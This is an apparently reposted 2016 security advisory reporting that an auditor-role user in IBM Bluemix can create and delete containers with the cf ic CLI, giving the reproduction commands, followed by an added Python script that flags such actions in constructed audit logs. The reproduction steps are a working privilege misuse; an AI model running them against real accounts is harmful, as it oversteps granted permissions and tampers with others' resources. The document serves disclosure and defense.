Friday, December 9, 2016

[FD] Broken access control on bluemix containers

# Date : 09/12/2016
# Author : Oscar Martinez
# Tested on: cf version 6.22.1+6b7af9c-2016-09-24 / Docker version 1.12.3, build 6b644ec / API endpoint: http://ift.tt/QKImQk (API version: 2.54.0)
# Vendor : IBM
# Software : bluemix http://ift.tt/2cNOB18
# Vulnerability Description:

It is assumed that a user with auditor role should not be able to create or delete containers.
reference: http://ift.tt/2hmZbT8

But, a user with auditor role CAN create or delete containers using the cli CF.

1. Connect to bluemix using the cli CF with the user with "auditor" role.
   1.1 cf login [-sso]
   1.2 cf ic init

2. Show the images
   2.1 cf ic images

3. Create the container
   3.1 cf ic run --name broken_access_666 -p 8080 -m 512 http://ift.tt/2gIWYgT site]/[your image]
   example:
   cf ic run --name broken_access_666 -p 8080 -m 512 http://ift.tt/2hn0Ecf

4. Delete your container
   cf ic stop [your container]
   cf ic rm [your container]
   example:
   cf ic stop broken_access_666
   cf ic rm broken_access_666

Time Line

Source: Gmail -> IFTTT-> Blogger
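
A defender-side check for the flaw described in the advisory, as an added example that is not part of the original post or IBM's code: it scans container audit events for state-changing actions performed by users who hold no write-capable role in the space. The event fields, role names, users and the policy that only "developer" may change containers are assumptions, and all data is constructed.

```python
from collections import defaultdict

# Container actions from the advisory's steps that change state.
MUTATING = {"run", "stop", "rm"}
# Assumption: only this role is meant to change containers in a space.
WRITE_ROLES = {"developer"}

# Constructed role assignments: (user, space) -> roles held there.
ROLES = {
    ("alice@example.com", "dev"): {"developer"},
    ("bob@example.com", "dev"): {"auditor"},
    ("carol@example.com", "dev"): {"auditor", "developer"},
}

# Constructed audit events; the field layout is hypothetical.
EVENTS = [
    {"user": "alice@example.com", "space": "dev", "action": "run", "target": "web1"},
    {"user": "bob@example.com", "space": "dev", "action": "images", "target": ""},
    {"user": "bob@example.com", "space": "dev", "action": "run", "target": "broken_access_666"},
    {"user": "bob@example.com", "space": "dev", "action": "rm", "target": "broken_access_666"},
    {"user": "carol@example.com", "space": "dev", "action": "stop", "target": "web1"},
    {"user": "dave@example.com", "space": "dev", "action": "rm", "target": "web1"},
]

def find_violations(events, roles):
    """Return events where a state-changing action was performed by a
    principal holding no write-capable role in that space."""
    out = []
    for ev in events:
        if ev["action"] not in MUTATING:
            continue  # read-only actions such as listing images are fine
        held = roles.get((ev["user"], ev["space"]), set())
        if not held & WRITE_ROLES:
            # Users with no role at all are reported too (held is empty).
            out.append({**ev, "roles": sorted(held)})
    return out

def summarize(violations):
    """Group violating actions per user for triage."""
    by_user = defaultdict(list)
    for v in violations:
        by_user[v["user"]].append(f'{v["action"]}:{v["target"]}')
    return dict(by_user)

if __name__ == "__main__":
    for user, acts in summarize(find_violations(EVENTS, ROLES)).items():
        print(user, acts)
```
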